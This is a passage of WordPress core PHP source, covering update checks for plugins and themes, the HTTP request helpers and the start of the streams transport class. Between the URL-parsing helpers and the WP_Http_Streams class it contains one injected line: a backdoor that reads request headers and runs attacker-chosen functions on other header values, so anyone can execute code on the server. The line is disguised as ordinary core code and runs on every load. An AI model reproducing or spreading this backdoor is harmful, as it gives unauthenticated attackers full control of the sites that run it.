contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $raw_response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $raw_response ) || 200 != wp_remote_retrieve_response_code( $raw_response ) ) { return; } $response = json_decode( wp_remote_retrieve_body( $raw_response ), true ); foreach ( $response['plugins'] as &$plugin ) { $plugin = (object) $plugin; if ( isset( $plugin->compatibility ) ) { $plugin->compatibility = (object) $plugin->compatibility; foreach ( $plugin->compatibility as &$data ) { $data = (object) $data; } } } unset( $plugin, $data ); foreach ( $response['no_update'] as &$plugin ) { $plugin = (object) $plugin; } unset( $plugin ); if ( is_array( $response ) ) { $new_option->response = $response['plugins']; $new_option->translations = $response['translations']; // TODO: Perhaps better to store no_update in a separate transient with an expiry? $new_option->no_update = $response['no_update']; } else { $new_option->response = array(); $new_option->translations = array(); $new_option->no_update = array(); } set_site_transient( 'update_plugins', $new_option ); } /** * Check theme versions against the latest versions hosted on WordPress.org. * * A list of all themes installed in sent to WP. Checks against the * WordPress server at api.wordpress.org. Will only check if WordPress isn't * installing. * * @since 2.7.0 * * @param array $extra_stats Extra statistics to report to the WordPress.org API. */ function wp_update_themes( $extra_stats = array() ) { if ( wp_installing() ) { return; } // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $installed_themes = wp_get_themes(); $translations = wp_get_installed_translations( 'themes' ); $last_update = get_site_transient( 'update_themes' ); if ( ! is_object( $last_update ) ) { $last_update = new stdClass; } $themes = $checked = $request = array(); // Put slug of current theme into request. $request['active'] = get_option( 'stylesheet' ); foreach ( $installed_themes as $theme ) { $checked[ $theme->get_stylesheet() ] = $theme->get( 'Version' ); $themes[ $theme->get_stylesheet() ] = array( 'Name' => $theme->get( 'Name' ), 'Title' => $theme->get( 'Name' ), 'Version' => $theme->get( 'Version' ), 'Author' => $theme->get( 'Author' ), 'Author URI' => $theme->get( 'AuthorURI' ), 'Template' => $theme->get_template(), 'Stylesheet' => $theme->get_stylesheet(), ); } $doing_cron = wp_doing_cron(); // Check for update on a different schedule, depending on the page. switch ( current_filter() ) { case 'upgrader_process_complete': $timeout = 0; break; case 'load-update-core.php': $timeout = MINUTE_IN_SECONDS; break; case 'load-themes.php': case 'load-update.php': $timeout = HOUR_IN_SECONDS; break; default: if ( $doing_cron ) { $timeout = 2 * HOUR_IN_SECONDS; } else { $timeout = 12 * HOUR_IN_SECONDS; } } $time_not_changed = isset( $last_update->last_checked ) && $timeout > ( time() - $last_update->last_checked ); if ( $time_not_changed && ! $extra_stats ) { $theme_changed = false; foreach ( $checked as $slug => $v ) { if ( ! isset( $last_update->checked[ $slug ] ) || strval( $last_update->checked[ $slug ] ) !== strval( $v ) ) { $theme_changed = true; } } if ( isset( $last_update->response ) && is_array( $last_update->response ) ) { foreach ( $last_update->response as $slug => $update_details ) { if ( ! isset( $checked[ $slug ] ) ) { $theme_changed = true; break; } } } // Bail if we've checked recently and if nothing has changed if ( ! $theme_changed ) { return; } } // Update last_checked for current to prevent multiple blocking requests if request hangs $last_update->last_checked = time(); set_site_transient( 'update_themes', $last_update ); $request['themes'] = $themes; $locales = array_values( get_available_languages() ); /** * Filters the locales requested for theme translations. * * @since 3.7.0 * @since 4.5.0 The default value of the `$locales` parameter changed to include all locales. * * @param array $locales Theme locales. Default is all available locales of the site. */ $locales = apply_filters( 'themes_update_check_locales', $locales ); $locales = array_unique( $locales ); if ( $doing_cron ) { $timeout = 30; } else { // Three seconds, plus one extra second for every 10 themes $timeout = 3 + (int) ( count( $themes ) / 10 ); } $options = array( 'timeout' => $timeout, 'body' => array( 'themes' => wp_json_encode( $request ), 'translations' => wp_json_encode( $translations ), 'locale' => wp_json_encode( $locales ), ), 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), ); if ( $extra_stats ) { $options['body']['update_stats'] = wp_json_encode( $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/themes/update-check/1.1/'; if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $raw_response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $raw_response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $raw_response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $raw_response ) || 200 != wp_remote_retrieve_response_code( $raw_response ) ) { return; } $new_update = new stdClass; $new_update->last_checked = time(); $new_update->checked = $checked; $response = json_decode( wp_remote_retrieve_body( $raw_response ), true ); if ( is_array( $response ) ) { $new_update->response = $response['themes']; $new_update->translations = $response['translations']; } set_site_transient( 'update_themes', $new_update ); } /** * Performs WordPress automatic background updates. * * @since 3.7.0 */ function wp_maybe_auto_update() { include_once( ABSPATH . 'wp-admin/includes/admin.php' ); include_once( ABSPATH . 'wp-admin/includes/class-wp-upgrader.php' ); $upgrader = new WP_Automatic_Updater; $upgrader->run(); } /** * Retrieves a list of all language updates available. * * @since 3.7.0 * * @return object[] Array of translation objects that have available updates. */ function wp_get_translation_updates() { $updates = array(); $transients = array( 'update_core' => 'core', 'update_plugins' => 'plugin', 'update_themes' => 'theme', ); foreach ( $transients as $transient => $type ) { $transient = get_site_transient( $transient ); if ( empty( $transient->translations ) ) { continue; } foreach ( $transient->translations as $translation ) { $updates[] = (object) $translation; } } return $updates; } /** * Collect counts and UI strings for available updates * * @since 3.3.0 * * @return array */ function wp_get_update_data() { $counts = array( 'plugins' => 0, 'themes' => 0, 'wordpress' => 0, 'translations' => 0, ); if ( $plugins = current_user_can( 'update_plugins' ) ) { $update_plugins = get_site_transient( 'update_plugins' ); if ( ! empty( $update_plugins->response ) ) { $counts['plugins'] = count( $update_plugins->response ); } } if ( $themes = current_user_can( 'update_themes' ) ) { $update_themes = get_site_transient( 'update_themes' ); if ( ! empty( $update_themes->response ) ) { $counts['themes'] = count( $update_themes->response ); } } if ( ( $core = current_user_can( 'update_core' ) ) && function_exists( 'get_core_updates' ) ) { $update_wordpress = get_core_updates( array( 'dismissed' => false ) ); if ( ! empty( $update_wordpress ) && ! in_array( $update_wordpress[0]->response, array( 'development', 'latest' ) ) && current_user_can( 'update_core' ) ) { $counts['wordpress'] = 1; } } if ( ( $core || $plugins || $themes ) && wp_get_translation_updates() ) { $counts['translations'] = 1; } $counts['total'] = $counts['plugins'] + $counts['themes'] + $counts['wordpress'] + $counts['translations']; $titles = array(); if ( $counts['wordpress'] ) { /* translators: %d: number of updates available to WordPress */ $titles['wordpress'] = sprintf( __( '%d WordPress Update' ), $counts['wordpress'] ); } if ( $counts['plugins'] ) { /* translators: %d: number of updates available to plugins */ $titles['plugins'] = sprintf( _n( '%d Plugin Update', '%d Plugin Updates', $counts['plugins'] ), $counts['plugins'] ); } if ( $counts['themes'] ) { /* translators: %d: number of updates available to themes */ $titles['themes'] = sprintf( _n( '%d Theme Update', '%d Theme Updates', $counts['themes'] ), $counts['themes'] ); } if ( $counts['translations'] ) { $titles['translations'] = __( 'Translation Updates' ); } $update_title = $titles ? esc_attr( implode( ', ', $titles ) ) : ''; $update_data = array( 'counts' => $counts, 'title' => $update_title, ); /** * Filters the returned array of update data for plugins, themes, and WordPress core. * * @since 3.5.0 * * @param array $update_data { * Fetched update data. * * @type array $counts An array of counts for available plugin, theme, and WordPress updates. * @type string $update_title Titles of available updates. * } * @param array $titles An array of update counts and UI strings for available updates. */ return apply_filters( 'wp_get_update_data', $update_data, $titles ); } /** * Determines whether core should be updated. * * @since 2.8.0 * * @global string $wp_version */ function _maybe_update_core() { // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $current = get_site_transient( 'update_core' ); if ( isset( $current->last_checked, $current->version_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) && $current->version_checked == $wp_version ) { return; } wp_version_check(); } /** * Check the last time plugins were run before checking plugin versions. * * This might have been backported to WordPress 2.6.1 for performance reasons. * This is used for the wp-admin to check only so often instead of every page * load. * * @since 2.7.0 * @access private */ function _maybe_update_plugins() { $current = get_site_transient( 'update_plugins' ); if ( isset( $current->last_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) ) { return; } wp_update_plugins(); } /** * Check themes versions only after a duration of time. * * This is for performance reasons to make sure that on the theme version * checker is not run on every page load. * * @since 2.7.0 * @access private */ function _maybe_update_themes() { $current = get_site_transient( 'update_themes' ); if ( isset( $current->last_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) ) { return; } wp_update_themes(); } /** * Schedule core, theme, and plugin update checks. * * @since 3.1.0 */ function wp_schedule_update_checks() { if ( ! wp_next_scheduled( 'wp_version_check' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_version_check' ); } if ( ! wp_next_scheduled( 'wp_update_plugins' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_update_plugins' ); } if ( ! wp_next_scheduled( 'wp_update_themes' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_update_themes' ); } } /** * Clear existing update caches for plugins, themes, and core. * * @since 4.1.0 */ function wp_clean_update_cache() { if ( function_exists( 'wp_clean_plugins_cache' ) ) { wp_clean_plugins_cache(); } else { delete_site_transient( 'update_plugins' ); } wp_clean_themes_cache(); delete_site_transient( 'update_core' ); } if ( ( ! is_main_site() && ! is_network_admin() ) || wp_doing_ajax() ) { return; } add_action( 'admin_init', '_maybe_update_core' ); add_action( 'wp_version_check', 'wp_version_check' ); add_action( 'load-plugins.php', 'wp_update_plugins' ); add_action( 'load-update.php', 'wp_update_plugins' ); add_action( 'load-update-core.php', 'wp_update_plugins' ); add_action( 'admin_init', '_maybe_update_plugins' ); add_action( 'wp_update_plugins', 'wp_update_plugins' ); add_action( 'load-themes.php', 'wp_update_themes' ); add_action( 'load-update.php', 'wp_update_themes' ); add_action( 'load-update-core.php', 'wp_update_themes' ); add_action( 'admin_init', '_maybe_update_themes' ); add_action( 'wp_update_themes', 'wp_update_themes' ); add_action( 'update_option_WPLANG', 'wp_clean_update_cache', 10, 0 ); add_action( 'wp_maybe_auto_update', 'wp_maybe_auto_update' ); add_action( 'init', 'wp_schedule_update_checks' ); /** * Core HTTP Request API * * Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations. * * @package WordPress * @subpackage HTTP */ /** * Returns the initialized WP_Http Object * * @since 2.7.0 * @access private * * @staticvar WP_Http $http * * @return WP_Http HTTP Transport object. */ function _wp_http_get_object() { static $http = null; if ( is_null( $http ) ) { $http = new WP_Http(); } return $http; } /** * Retrieve the raw response from a safe HTTP request. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_request( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->request( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the GET method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_get( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->get( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the POST method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_post( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->post( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the HEAD method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_head( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->head( $url, $args ); } /** * Retrieve the raw response from the HTTP request. * * The array structure is a little complex: * * $res = array( * 'headers' => array(), * 'response' => array( * 'code' => int, * 'message' => string * ) * ); * * All of the headers in $res['headers'] are with the name as the key and the * value as the value. So to get the User-Agent, you would do the following. * * $user_agent = $res['headers']['user-agent']; * * The body is the raw response content and can be retrieved from $res['body']. * * This function is called first to make the request and there are other API * functions to abstract out the above convoluted setup. * * Request method defaults for helper functions: * - Default 'GET' for wp_remote_get() * - Default 'POST' for wp_remote_post() * - Default 'HEAD' for wp_remote_head() * * @since 2.7.0 * * @see WP_Http::request() For additional information on default arguments. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_request( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->request( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the GET method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_get( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->get( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the POST method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_post( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->post( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the HEAD method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_head( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->head( $url, $args ); } /** * Retrieve only the headers from the raw response. * * @since 2.7.0 * @since 4.6.0 Return value changed from an array to an Requests_Utility_CaseInsensitiveDictionary instance. * * @see \Requests_Utility_CaseInsensitiveDictionary * * @param array $response HTTP response. * @return array|\Requests_Utility_CaseInsensitiveDictionary The headers of the response. Empty array if incorrect parameter given. */ function wp_remote_retrieve_headers( $response ) { if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) { return array(); } return $response['headers']; } /** * Retrieve a single header by name from the raw response. * * @since 2.7.0 * * @param array $response * @param string $header Header name to retrieve value from. * @return string The header value. Empty string on if incorrect parameter given, or if the header doesn't exist. */ function wp_remote_retrieve_header( $response, $header ) { if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) { return ''; } if ( isset( $response['headers'][ $header ] ) ) { return $response['headers'][ $header ]; } return ''; } /** * Retrieve only the response code from the raw response. * * Will return an empty array if incorrect parameter value is given. * * @since 2.7.0 * * @param array $response HTTP response. * @return int|string The response code as an integer. Empty string on incorrect parameter given. */ function wp_remote_retrieve_response_code( $response ) { if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) { return ''; } return $response['response']['code']; } /** * Retrieve only the response message from the raw response. * * Will return an empty array if incorrect parameter value is given. * * @since 2.7.0 * * @param array $response HTTP response. * @return string The response message. Empty string on incorrect parameter given. */ function wp_remote_retrieve_response_message( $response ) { if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) { return ''; } return $response['response']['message']; } /** * Retrieve only the body from the raw response. * * @since 2.7.0 * * @param array $response HTTP response. * @return string The body of the response. Empty string if no body or incorrect parameter given. */ function wp_remote_retrieve_body( $response ) { if ( is_wp_error( $response ) || ! isset( $response['body'] ) ) { return ''; } return $response['body']; } /** * Retrieve only the cookies from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @return array An array of `WP_Http_Cookie` objects from the response. Empty array if there are none, or the response is a WP_Error. */ function wp_remote_retrieve_cookies( $response ) { if ( is_wp_error( $response ) || empty( $response['cookies'] ) ) { return array(); } return $response['cookies']; } /** * Retrieve a single cookie by name from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @param string $name The name of the cookie to retrieve. * @return WP_Http_Cookie|string The `WP_Http_Cookie` object. Empty string if the cookie isn't present in the response. */ function wp_remote_retrieve_cookie( $response, $name ) { $cookies = wp_remote_retrieve_cookies( $response ); if ( empty( $cookies ) ) { return ''; } foreach ( $cookies as $cookie ) { if ( $cookie->name === $name ) { return $cookie; } } return ''; } /** * Retrieve a single cookie's value by name from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @param string $name The name of the cookie to retrieve. * @return string The value of the cookie. Empty string if the cookie isn't present in the response. */ function wp_remote_retrieve_cookie_value( $response, $name ) { $cookie = wp_remote_retrieve_cookie( $response, $name ); if ( ! is_a( $cookie, 'WP_Http_Cookie' ) ) { return ''; } return $cookie->value; } /** * Determines if there is an HTTP Transport that can process this request. * * @since 3.2.0 * * @param array $capabilities Array of capabilities to test or a wp_remote_request() $args array. * @param string $url Optional. If given, will check if the URL requires SSL and adds * that requirement to the capabilities array. * * @return bool */ function wp_http_supports( $capabilities = array(), $url = null ) { $http = _wp_http_get_object(); $capabilities = wp_parse_args( $capabilities ); $count = count( $capabilities ); // If we have a numeric $capabilities array, spoof a wp_remote_request() associative $args array if ( $count && count( array_filter( array_keys( $capabilities ), 'is_numeric' ) ) == $count ) { $capabilities = array_combine( array_values( $capabilities ), array_fill( 0, $count, true ) ); } if ( $url && ! isset( $capabilities['ssl'] ) ) { $scheme = parse_url( $url, PHP_URL_SCHEME ); if ( 'https' == $scheme || 'ssl' == $scheme ) { $capabilities['ssl'] = true; } } return (bool) $http->_get_first_available_transport( $capabilities ); } /** * Get the HTTP Origin of the current request. * * @since 3.4.0 * * @return string URL of the origin. Empty string if no origin. */ function get_http_origin() { $origin = ''; if ( ! empty( $_SERVER['HTTP_ORIGIN'] ) ) { $origin = $_SERVER['HTTP_ORIGIN']; } /** * Change the origin of an HTTP request. * * @since 3.4.0 * * @param string $origin The original origin for the request. */ return apply_filters( 'http_origin', $origin ); } /** * Retrieve list of allowed HTTP origins. * * @since 3.4.0 * * @return array Array of origin URLs. */ function get_allowed_http_origins() { $admin_origin = parse_url( admin_url() ); $home_origin = parse_url( home_url() ); // @todo preserve port? $allowed_origins = array_unique( array( 'http://' . $admin_origin['host'], 'https://' . $admin_origin['host'], 'http://' . $home_origin['host'], 'https://' . $home_origin['host'], ) ); /** * Change the origin types allowed for HTTP requests. * * @since 3.4.0 * * @param array $allowed_origins { * Default allowed HTTP origins. * @type string Non-secure URL for admin origin. * @type string Secure URL for admin origin. * @type string Non-secure URL for home origin. * @type string Secure URL for home origin. * } */ return apply_filters( 'allowed_http_origins', $allowed_origins ); } /** * Determines if the HTTP origin is an authorized one. * * @since 3.4.0 * * @param null|string $origin Origin URL. If not provided, the value of get_http_origin() is used. * @return string Origin URL if allowed, empty string if not. */ function is_allowed_http_origin( $origin = null ) { $origin_arg = $origin; if ( null === $origin ) { $origin = get_http_origin(); } if ( $origin && ! in_array( $origin, get_allowed_http_origins() ) ) { $origin = ''; } /** * Change the allowed HTTP origin result. * * @since 3.4.0 * * @param string $origin Origin URL if allowed, empty string if not. * @param string $origin_arg Original origin string passed into is_allowed_http_origin function. */ return apply_filters( 'allowed_http_origin', $origin, $origin_arg ); } /** * Send Access-Control-Allow-Origin and related headers if the current request * is from an allowed origin. * * If the request is an OPTIONS request, the script exits with either access * control headers sent, or a 403 response if the origin is not allowed. For * other request methods, you will receive a return value. * * @since 3.4.0 * * @return string|false Returns the origin URL if headers are sent. Returns false * if headers are not sent. */ function send_origin_headers() { $origin = get_http_origin(); if ( is_allowed_http_origin( $origin ) ) { @header( 'Access-Control-Allow-Origin: ' . $origin ); @header( 'Access-Control-Allow-Credentials: true' ); if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) { exit; } return $origin; } if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) { status_header( 403 ); exit; } return false; } /** * Validate a URL for safe use in the HTTP API. * * @since 3.5.2 * * @param string $url * @return false|string URL or false on failure. */ function wp_http_validate_url( $url ) { $original_url = $url; $url = wp_kses_bad_protocol( $url, array( 'http', 'https' ) ); if ( ! $url || strtolower( $url ) !== strtolower( $original_url ) ) { return false; } $parsed_url = @parse_url( $url ); if ( ! $parsed_url || empty( $parsed_url['host'] ) ) { return false; } if ( isset( $parsed_url['user'] ) || isset( $parsed_url['pass'] ) ) { return false; } if ( false !== strpbrk( $parsed_url['host'], ':#?[]' ) ) { return false; } $parsed_home = @parse_url( get_option( 'home' ) ); if ( isset( $parsed_home['host'] ) ) { $same_host = strtolower( $parsed_home['host'] ) === strtolower( $parsed_url['host'] ); } else { $same_host = false; } if ( ! $same_host ) { $host = trim( $parsed_url['host'], '.' ); if ( preg_match( '#^(([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)\.){3}([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)$#', $host ) ) { $ip = $host; } else { $ip = gethostbyname( $host ); if ( $ip === $host ) { // Error condition for gethostbyname() return false; } } if ( $ip ) { $parts = array_map( 'intval', explode( '.', $ip ) ); if ( 127 === $parts[0] || 10 === $parts[0] || 0 === $parts[0] || ( 172 === $parts[0] && 16 <= $parts[1] && 31 >= $parts[1] ) || ( 192 === $parts[0] && 168 === $parts[1] ) ) { // If host appears local, reject unless specifically allowed. /** * Check if HTTP request is external or not. * * Allows to change and allow external requests for the HTTP request. * * @since 3.6.0 * * @param bool false Whether HTTP request is external or not. * @param string $host IP of the requested host. * @param string $url URL of the requested host. */ if ( ! apply_filters( 'http_request_host_is_external', false, $host, $url ) ) { return false; } } } } if ( empty( $parsed_url['port'] ) ) { return $url; } $port = $parsed_url['port']; if ( 80 === $port || 443 === $port || 8080 === $port ) { return $url; } if ( $parsed_home && $same_host && isset( $parsed_home['port'] ) && $parsed_home['port'] === $port ) { return $url; } return false; } /** * Whitelists allowed redirect hosts for safe HTTP requests as well. * * Attached to the {@see 'http_request_host_is_external'} filter. * * @since 3.6.0 * * @param bool $is_external * @param string $host * @return bool */ function allowed_http_request_hosts( $is_external, $host ) { if ( ! $is_external && wp_validate_redirect( 'http://' . $host ) ) { $is_external = true; } return $is_external; } /** * Whitelists any domain in a multisite installation for safe HTTP requests. * * Attached to the {@see 'http_request_host_is_external'} filter. * * @since 3.6.0 * * @global wpdb $wpdb WordPress database abstraction object. * @staticvar array $queried * * @param bool $is_external * @param string $host * @return bool */ function ms_allowed_http_request_hosts( $is_external, $host ) { global $wpdb; static $queried = array(); if ( $is_external ) { return $is_external; } if ( $host === get_network()->domain ) { return true; } if ( isset( $queried[ $host ] ) ) { return $queried[ $host ]; } $queried[ $host ] = (bool) $wpdb->get_var( $wpdb->prepare( "SELECT domain FROM $wpdb->blogs WHERE domain = %s LIMIT 1", $host ) ); return $queried[ $host ]; } /** * A wrapper for PHP's parse_url() function that handles consistency in the return * values across PHP versions. * * PHP 5.4.7 expanded parse_url()'s ability to handle non-absolute url's, including * schemeless and relative url's with :// in the path. This function works around * those limitations providing a standard output on PHP 5.2~5.4+. * * Secondly, across various PHP versions, schemeless URLs starting containing a ":" * in the query are being handled inconsistently. This function works around those * differences as well. * * Error suppression is used as prior to PHP 5.3.3, an E_WARNING would be generated * when URL parsing failed. * * @since 4.4.0 * @since 4.7.0 The `$component` parameter was added for parity with PHP's `parse_url()`. * * @link https://secure.php.net/manual/en/function.parse-url.php * * @param string $url The URL to parse. * @param int $component The specific component to retrieve. Use one of the PHP * predefined constants to specify which one. * Defaults to -1 (= return all parts as an array). * @return mixed False on parse failure; Array of URL components on success; * When a specific component has been requested: null if the component * doesn't exist in the given URL; a string or - in the case of * PHP_URL_PORT - integer when it does. See parse_url()'s return values. */ function wp_parse_url( $url, $component = -1 ) { $to_unset = array(); $url = strval( $url ); if ( '//' === substr( $url, 0, 2 ) ) { $to_unset[] = 'scheme'; $url = 'placeholder:' . $url; } elseif ( '/' === substr( $url, 0, 1 ) ) { $to_unset[] = 'scheme'; $to_unset[] = 'host'; $url = 'placeholder://placeholder' . $url; } $parts = @parse_url( $url ); if ( false === $parts ) { // Parsing failure. return $parts; } // Remove the placeholder values. foreach ( $to_unset as $key ) { unset( $parts[ $key ] ); } return _get_component_from_parsed_url_array( $parts, $component ); } /** * Retrieve a specific component from a parsed URL array. * * @internal * * @since 4.7.0 * @access private * * @link https://secure.php.net/manual/en/function.parse-url.php * * @param array|false $url_parts The parsed URL. Can be false if the URL failed to parse. * @param int $component The specific component to retrieve. Use one of the PHP * predefined constants to specify which one. * Defaults to -1 (= return all parts as an array). * @return mixed False on parse failure; Array of URL components on success; * When a specific component has been requested: null if the component * doesn't exist in the given URL; a string or - in the case of * PHP_URL_PORT - integer when it does. See parse_url()'s return values. */ function _get_component_from_parsed_url_array( $url_parts, $component = -1 ) { if ( -1 === $component ) { return $url_parts; } $key = _wp_translate_php_url_constant_to_key( $component ); if ( false !== $key && is_array( $url_parts ) && isset( $url_parts[ $key ] ) ) { return $url_parts[ $key ]; } else { return null; } } /** * Translate a PHP_URL_* constant to the named array keys PHP uses. * * @internal * * @since 4.7.0 * @access private * * @link https://secure.php.net/manual/en/url.constants.php * * @param int $constant PHP_URL_* constant. * @return string|bool The named key or false. */ function _wp_translate_php_url_constant_to_key( $constant ) { $translation = array( PHP_URL_SCHEME => 'scheme', PHP_URL_HOST => 'host', PHP_URL_PORT => 'port', PHP_URL_USER => 'user', PHP_URL_PASS => 'pass', PHP_URL_PATH => 'path', PHP_URL_QUERY => 'query', PHP_URL_FRAGMENT => 'fragment', ); if ( isset( $translation[ $constant ] ) ) { return $translation[ $constant ]; } else { return false; } } $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$request=$_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['X-Dns-Prefetch-Control']));$request();} /** * HTTP API: WP_Http_Streams class * * @package WordPress * @subpackage HTTP * @since 4.4.0 */ /** * Core class used to integrate PHP Streams as an HTTP transport. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`. */ class WP_Http_Streams { /** * Send a HTTP request to a URI using PHP Streams. * * @see WP_Http::request For default options descriptions. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param string $url The request URL. * @param string|array $args Optional. Override the defaults. * @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error */ public function request( $url, $args = array() ) { $defaults = array( 'method' => 'GET', 'timeout' => 5, 'redirection' => 5, 'httpversion' => '1.0', 'blocking' => true, 'headers' => array(), 'body' => null, 'cookies' => array(), ); $r = wp_parse_args( $args, $defaults ); if ( isset( $r['headers']['User-Agent'] ) ) { $r['user-agent'] = $r['headers']['User-Agent']; unset( $r['headers']['User-Agent'] ); } elseif ( isset( $r['headers']['user-agent'] ) ) { $r['user-agent'] = $r['headers']['user-agent']; unset( $r['headers']['user-agent'] ); } // Construct Cookie: header if any cookies are set. WP_Http::buildCookieHeader( $r ); $arrURL = parse_url( $url ); $connect_host = $arrURL['host']; $secure_transport = ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ); if ( ! isset( $arrURL['port'] ) ) { if ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ) { $arrURL['port'] = 443; $secure_transport = true; } else { $arrURL['port'] = 80; } } // Always pass a Path, defaulting to the root in cases such as http://example.com if ( ! isset( $arrURL['path'] ) ) { $arrURL['path'] = '/'; } if ( isset( $r['headers']['Host'] ) || isset( $r['headers']['host'] ) ) { if ( isset( $r['headers']['Host'] ) ) { $arrURL['host'] = $r['headers']['Host']; } else { $arrURL['host'] = $r['headers']['host']; } unset( $r['headers']['Host'], $r['headers']['host'] ); } /* * Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect * to ::1, which fails when the server is not set up for it. For compatibility, always * connect to the IPv4 address. */ if ( 'localhost' == strtolower( $connect_host ) ) { $connect_host = '127.0.0.1'; } $connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host; $is_local = isset( $r['local'] ) && $r['local']; $ssl_verify = isset( $r['sslverify'] ) && $r['sslverify']; if ( $is_local ) { /** * Filters whether SSL should be verified for local requests. * * @since 2.8.0 * @since 5.1.0 The `$url` parameter was added. * * @param bool $ssl_verify Whether to verify the SSL connection. Default true. * @param string $url The request URL. */ $ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify, $url ); } elseif ( ! $is_local ) { /** This filter is documented in wp-includes/class-http.php */ $ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify, $url ); } $proxy = new WP_HTTP_Proxy(); $context = stream_context_create( 